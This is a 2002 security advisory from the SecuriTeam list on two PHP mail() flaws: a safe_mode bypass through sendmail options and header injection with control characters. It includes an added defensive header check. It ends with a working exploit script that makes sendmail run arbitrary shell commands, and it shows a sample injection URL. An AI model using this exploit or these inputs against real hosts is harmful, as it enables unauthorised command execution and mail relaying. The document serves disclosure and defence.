[UNIX] PHP Allows Bypassing of safe_mode And Injecting ASCII Control Chars With mail()
From: support@securiteam.com
Date: 08/27/02
From: support@securiteam.com To: list@securiteam.com Date: Tue, 27 Aug 2002 21:17:13 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PHP Allows Bypassing of safe_mode And Injecting ASCII Control Chars With mail()
------------------------------------------------------------------------
SUMMARY
PHP is a widely used general-purpose scripting language that is especially
suited for Web development and can be embedded into HTML. Two
vulnerabilities exist in PHP's mail() function. The first allows any
program or script to be executed, bypassing the safe_mode restriction; the
second may turn a script into an open relay if the mail() function is not
used carefully in PHP scripts.
DETAILS
Vulnerable systems:
* PHP version 4.x up to 4.2.2
Immune systems:
* PHP from the CVS has been patched
(1) Bypassing safe_mode restriction
If PHP is configured with the safe_mode option enabled, special restrictions
are set up, including a limit on the external binaries that may be executed
from within a PHP script.
The fifth argument to the mail() function (introduced in version 4.0.5)
allows command line options to be passed to the sendmail binary. Some time
ago a bug was found in the mail() function that allowed shell
meta-characters to be passed in the 5th argument, leading to execution of
arbitrary shell commands or external binaries. This bug was fixed in
version 4.1.0.
However, the mail() function is still vulnerable because it allows command
line arguments to be passed to the sendmail binary, which gives the ability
to influence its behavior (e.g. by using non-default aliases or custom
configuration files; other cases are possible with other MTAs).
Passing the fifth argument should be disabled if PHP is configured in
safe_mode.
Exploit attached at the end.
(2) Injecting ASCII control characters into mail() arguments
Arbitrary ASCII control characters may be injected into the string arguments
of the mail() function. If mail() arguments are taken from user input, this
may give the user the ability to alter message content, including mail
headers.
An example of such a vulnerability may be found on the PHP.net site:
(URL wrapped for readability)
http://www.php.net/mailing-lists.php?
maillist=your@email.com%0a&email=fake@from.net%0a
PHP should filter the content before creating the message body sent with
the "sendmail -t" command.
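The header injection described in (2), as an added example that is not part of the advisory: the naive header construction a script like the php.net one might use, a check that rejects CR, LF and NUL in any value destined for a header, and a constructed input mirroring the advisory's `%0a` URL parameter. All function names are assumptions.

```php
<?php
// Added example, not from the advisory. Function names are assumptions.

// Naive header construction: user input is concatenated straight into the
// header block that mail() hands to "sendmail -t".
function build_headers_naive(string $from): string
{
    return "From: " . $from . "\r\nX-Mailer: PHP\r\n";
}

// A value is safe for a header only if it carries no CR, LF or NUL: any of
// these lets the caller end the current header and begin a new one, or end
// the header block and start the message body.
function is_safe_header_value(string $value): bool
{
    return preg_match('/[\r\n\0]/', $value) !== 1;
}

// Hardened construction: refuse to build headers from tainted input instead
// of relaying whatever the caller injected.
function build_headers_checked(string $from): ?string
{
    if (!is_safe_header_value($from)) {
        return null;
    }
    return build_headers_naive($from);
}

// Constructed input mirroring the advisory's "email=fake@from.net%0a"
// parameter after URL decoding, with an extra header line appended.
$tainted = "fake@from.net\nX-Injected: yes";
$clean   = "user@example.invalid";

printf("clean accepted:   %s\n", is_safe_header_value($clean) ? "yes" : "no");
printf("tainted accepted: %s\n", is_safe_header_value($tainted) ? "yes" : "no");
// With the naive builder the injected line becomes a real header line:
echo build_headers_naive($tainted);
// With the checked builder no header block is produced at all:
var_dump(build_headers_checked($tainted));
```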
Impact:
(1) Any user may bypass safe_mode restrictions if the mail() function is
not disabled.
(2) An open-relay PHP script results if user data is poorly filtered, or
not filtered at all, before being passed to the mail() function.
Fix:
(1) has been successfully fixed in the latest CVS snapshot. The fix for (2)
is not sufficient: it is still possible to inject ASCII control characters
that cause the argument string to be truncated. Please refer to the example
URL mentioned above.
These bugs have not been fixed yet in the latest 4.2.2 stable release.
Exploit:
Sample exploit for (1) that works with the sendmail MTA:
-----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");
$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);
$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);
mail("nobody", "", "", "", "-C$cf");
?>
-----8<----- bypass_safe_mode.php -----8<-----
ADDITIONAL INFORMATION
The information has been provided by Wojciech Purczynski <mailto:cliph@isec.pl>.